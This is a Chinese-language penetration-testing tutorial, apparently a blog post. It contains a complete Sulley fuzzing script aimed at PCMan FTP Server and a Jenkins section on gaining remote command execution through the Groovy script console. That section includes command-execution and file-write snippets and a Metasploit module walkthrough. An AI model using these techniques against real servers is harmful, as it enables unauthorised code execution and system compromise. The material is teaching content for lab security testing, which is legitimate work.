漏洞评估-1

漏洞评估

 2017/12/15

漏洞评估

确定了最可行的攻击方法之后，您需要考虑如何访问目标。在脆弱性分析过程中，您可以结合前一阶段学到的信息，并用它来了解哪些攻击是可行的。其中，漏洞分析考虑了端口和漏洞扫描，通过抓取banner收集的数据以及收集情报期间收集的信息。

评估分类	书签
网络评估
Web应用程序评估
数据库评估

网络评估

Fuzzers-sulley

代码(fuzz_PCManftpd32.py)

#coding=utf-8
# 视频1使用Sulley框架的实现fuzz
# http://www.dfate.de/public/index.php/post/exploit-development-series-video-1-practical-fuzzing-basics-using-the-sulley-framework
# https://www.exploit-db.com/exploits/37731/

# -------------------------------------------------------------------
# Usage:
# C:\Fuzzing\sulley>python network_monitor.py -d 0 -f "port 21" -P audit
# C:\Fuzzing\sulley>python process_monitor.py -c audit\pcmanftpd_crashbin -p "PCManFTPD2.exe"

# -------------------------------------------------------------------
# 分析:

"""
220 PCMan's FTP Server 2.0 Ready.
USER anonymous
331 User name okay, need password.
PASS password12345
230 User logged in
PORT 192,168,1,106,206,27
200 Command okay.
STOR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,28
200 Command okay.
LIST
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,29
200 Command okay.
RETR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
QUIT
"""

from sulley import *

# 总体概述
#1.创建请求（定义模糊语法）
#2.定义会话
#3.定义目标
#4.fuzz！

# s_initialize - 构建一个新的请求
# s_static ("USER") - 一个静态（未改变）的字符串，不会被fuzz
# s_delin(" ") - 可以fuzz的分隔符，将有不同的使用s_string的变动
# s_string("anonymous") - 一个将被变动的字符串。 包含比s_delim更多的变动

# -------------------------------------------------------------------
# 语法测试
s_initialize("user")
s_static("USER")
s_delim(" ", fuzzable=False)
s_string("anonymous")
s_static("\r\n")

s_initialize("pass")
s_static("PASS")
s_delim(" ", fuzzable=False)
s_string("pass12345")
s_static("\r\n")

s_initialize("put")
s_static("PUT")
s_delim(" ", fuzzable=False)
s_string("fuzz_strings")
s_static("\r\n")

s_initialize("stor")
s_static("STOR")
s_delim(" ", fuzzable=True)
s_string("AAAA")
s_static("\r\n")

s_initialize("mkd")
s_static("MKD")
s_delim(" ", fuzzable=False)
s_string("AAAA")
s_static("\r\n")

# -------------------------------------------------------------------
# 定义pre_send函数。 三次握手后会立即执行
def receive_ftp_banner(sock):
    data = sock.recv(1024)
    print(data)

# -------------------------------------------------------------------
# 定义会话
# 会话参数
SESSION_FILENAME = "pcmanftpd-session"  # 跟踪当前的fuzz状态
SLEEP_TIME = 0.5                        # 在两次fuzz尝试之间暂停
TIMEOUT = 5                             # 没有连接5秒后，fuzz会超时
CRASH_THRESHOLD = 4                     # 4次崩溃后，参数将被跳过

mysession = sessions.session(
    session_filename=SESSION_FILENAME,
    sleep_time=SLEEP_TIME,
    timeout=TIMEOUT,
    crash_threshold=CRASH_THRESHOLD)

mysession.pre_send = receive_ftp_banner
mysession.connect(s_get("user"))
mysession.connect(s_get("user"), s_get("pass"))
mysession.connect(s_get("pass"), s_get("stor"))
mysession.connect(s_get("pass"), s_get("mkd"))
mysession.connect(s_get("pass"), s_get("put"))

# -------------------------------------------------------------------
# 绘制代表fuzz路径的图形。
with open("session_test.udg", "w+") as f:
    f.write(mysession.render_graph_udraw())

# -------------------------------------------------------------------
# 一些概述输出

print("Number of mutation during one case: %s\n" % str(s_num_mutations()))
print("Total number of mutations: %s\n" % str(s_num_mutations() * 5))

decision = raw_input("Do you want to continue?(y/n): ")
if decision == "n":
    exit()

# -------------------------------------------------------------------
# 定义目标具体参数
host = "192.168.1.107"
ftp_port = 21
netmon_port = 26001
procmon_port = 26002
target = sessions.target(host, ftp_port)
target.procmon = pedrpc.client(host, procmon_port)
target.netmon = pedrpc.client(host, netmon_port)

target.procmon_options = {
    "proc_name": "pcmanftpd2.exe",
    "stop_commands": ["wmic process where (name='PCManFTPD2.exe') call terminate"],
    "start_commands": ["C:\\PCManFTP\\PCManFTPD2.exe"]
}

# 将目标添加到会话
mysession.add_target(target)

# -------------------------------------------------------------------
# 让我们开始搞事情

print("Starting fuzzing now")
mysession.fuzz()

# 开启fuzz进程
# 也可以通过网页界面（http://127.0.0.1:26000）查看当前状态

代码分析

该代码通过sulley框架来进行fuzz测试，首先进行语法测试，构造多个新请求(包括FTP的user、pass、put、stor、mkd)，设置静态字符串和FUZZ字符串，然后定义pre_send三次握手后立即执行，定义会话及会话参数，绘制udg格式的fuzz路径图形，输入一些概述后定义目标具体参数，将目标添加到会话中，直接开始搞事情。

期间可以通过网页界面(http://127.0.0.1:26000)查看当前状态

Jenkins Hacking

如何部署jenkins？
如何利用jenkins服务器？

Jenkins是一个独立、开源的自动化服务器，可用于自动执行各种任务，如构建，测试和部署软件。Jenkins可以通过本地系统软件包Docker安装，甚至是独立运行在安装java运行环境的任何机器上。

如何部署jenkins？

这引导将使用“独立的”Jenkins发行版，该发行版要求最少使用Java 7，但建议使用Java 8。还建议使用超过512MB RAM的系统。

下载Jenkins.
在下载目录中打开终端并运行java -jar jenkins.war
在浏览器中打开http：// localhost：8080并按照说明完成安装。
许多Pipeline示例需要在与Jenkins相同的计算机上安装Docker。

请检查安装日志，如下：

root@lab:~/Downloads# java -jar jenkins.war
Running from: /root/Downloads/jenkins.war
webroot: $user.home/.jenkins
Mar 15, 2017 5:03:49 AM Main deleteWinstoneTempContents
WARNING: Failed to delete the temporary Winstone file /tmp/winstone/jenkins.war
Mar 15, 2017 5:03:50 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Logging initialized @6168ms
Mar 15, 2017 5:03:50 AM winstone.Logger logInternal
INFO: Beginning extraction from war file
Mar 15, 2017 5:04:05 AM org.eclipse.jetty.util.log.JavaUtilLog warn
WARNING: Empty contextPath
Mar 15, 2017 5:04:06 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: jetty-9.2.z-SNAPSHOT
Mar 15, 2017 5:04:10 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: NO JSP Support for /, did not find org.eclipse.jetty.jsp.JettyJspServlet
Jenkins home directory: /root/.jenkins found at: $user.home/.jenkins
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started w.@30990c1b{/,file:/root/.jenkins/war/,AVAILABLE}{/root/.jenkins/war}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started ServerConnector@54227100{HTTP/1.1}{0.0.0.0:8080}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started @36602ms
Mar 15, 2017 5:04:20 AM winstone.Logger logInternal
INFO: Winstone Servlet Engine v2.0 running: controlPort=disabled
Mar 15, 2017 5:04:22 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started initialization
Mar 15, 2017 5:04:23 AM jenkins.InitReactorRunner$1 onAttained
INFO: Listed all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Prepared all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Augmented all extensions
Mar 15, 2017 5:04:51 AM jenkins.InitReactorRunner$1 onAttained
INFO: Loaded all jobs
Mar 15, 2017 5:04:51 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Started Download metadata
Mar 15, 2017 5:04:52 AM org.jenkinsci.main.modules.sshd.SSHD start
INFO: Started SSHD at port 43731
Mar 15, 2017 5:04:53 AM jenkins.InitReactorRunner$1 onAttained
INFO: Completed initialization
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:55 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701]: org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485
Mar 15, 2017 5:04:55 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485: defining beans [authenticationManager]; root of factory hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:58 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4]: org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965
Mar 15, 2017 5:04:58 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965: defining beans [filter,legacy]; root of factory hierarchy
Mar 15, 2017 5:04:59 AM jenkins.install.SetupWizard init
INFO:

*************************************************************
*************************************************************
*************************************************************

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

This may also be found at: /root/.jenkins/secrets/initialAdminPassword

*************************************************************
*************************************************************
*************************************************************

Mar 15, 2017 5:05:06 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:09 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tasks.Maven.MavenInstaller
Mar 15, 2017 5:05:09 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:10 AM hudson.WebAppMain$3 run
INFO: Jenkins is fully up and running
Mar 15, 2017 5:05:10 AM javax.jmdns.impl.HostInfo newHostInfo
WARNING: Could not intialize the host network interface on nullbecause of an error: lab: lab: Temporary failure in name resolution
java.net.UnknownHostException: lab: lab: Temporary failure in name resolution
	at java.net.InetAddress.getLocalHost(InetAddress.java:1505)
	at javax.jmdns.impl.HostInfo.newHostInfo(HostInfo.java:75)
	at javax.jmdns.impl.JmDNSImpl.<init>(JmDNSImpl.java:407)
	at javax.jmdns.JmDNS.create(JmDNS.java:60)
	at hudson.DNSMultiCast$1.call(DNSMultiCast.java:33)
	at jenkins.util.ContextResettingExecutorService$2.call(ContextResettingExecutorService.java:46)
	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
	at java.lang.Thread.run(Thread.java:745)
Caused by: java.net.UnknownHostException: lab: Temporary failure in name resolution
	at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
	at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:928)
	at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1323)
	at java.net.InetAddress.getLocalHost(InetAddress.java:1500)
	... 9 more

Mar 15, 2017 5:05:18 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tools.JDKInstaller
Mar 15, 2017 5:05:18 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Finished Download metadata. 27,508 ms

请注意这里，我们需要密码来完成设置。

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

如何利用jenkins服务器？

访问 http://127.0.0.1:8080/script, 并用脚本控制台pwn jenkins服务器。

脚本控制台

输入一个任意的Groovy脚本并在服务器上执行它。用于故障排除和诊断。使用’println’命令来查看输出结果(如果使用System.out，它将转到服务器的stdout，这是很难看到的。)

例如：

execmd.groovy

execmd.groovy 可以帮助你在jenkins服务器上执行os命令。

# Windows

println "cmd.exe /c dir".execute().text


# Linux

println "uname -a".execute().text

writefile.groovy

writefile.groovy 可以将字符串写入jenkins服务器上的文件。

new File("/tmp/test.sh").write("""
echo "123"
echo "456"
""")

如果你更喜欢metasploit-framework,

msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.100    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME   test             no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Linux
msf exploit(jenkins_script_console) > exploit

链接

https://jenkins.io/

WEB应用程序评估

Android hacking 与安全

安卓逆向工程

Android安全和渗透利用

介绍
Android的安全性-介绍
Android-架构
Android-权限
Android-应用
Genymotion(一款安卓模拟器) 设置
Android-应用程序组件
Dex-分析
Android-调试桥
基于日志记录的漏洞
应用逆向
分析Android的软件及恶意软件
流量分析
SSL-Pinning
泄漏的内容提供商
Drozer-功夫
基于read的内容提供商漏洞
进阶Drozer-功夫
Drozer脚本
Dropbox的脆弱性
基于备份的漏洞
客户端注入
Hooking 介绍和不安全的设置
基于Andbug的Android调试
JDB调试
用Introspy自动Hooking
Cydia-基底
使用Xposed进行Hooking
Androguard脚本和分析
基于webviews的漏洞
利用Metasploit工具攻击webviews

书籍推荐

Android安全手册
Android黑客手册
学习针对Android设备的测试

参考链接

CATALOG

1. 漏洞评估
1. 1.1. 网络评估
  1. 1.1.1. Fuzzers-sulley
    1. 1.1.1.1. 代码分析
  2. 1.1.2. Jenkins Hacking
2. 1.2. WEB应用程序评估
2. 参考链接



漏洞评估-1

漏洞评估

网络评估

Fuzzers-sulley

代码分析

Jenkins Hacking

如何部署jenkins？

如何利用jenkins服务器？

execmd.groovy

writefile.groovy

链接

WEB应用程序评估

Android hacking 与 安全

安卓逆向工程

Android安全和渗透利用

书籍推荐

参考链接

Android hacking 与安全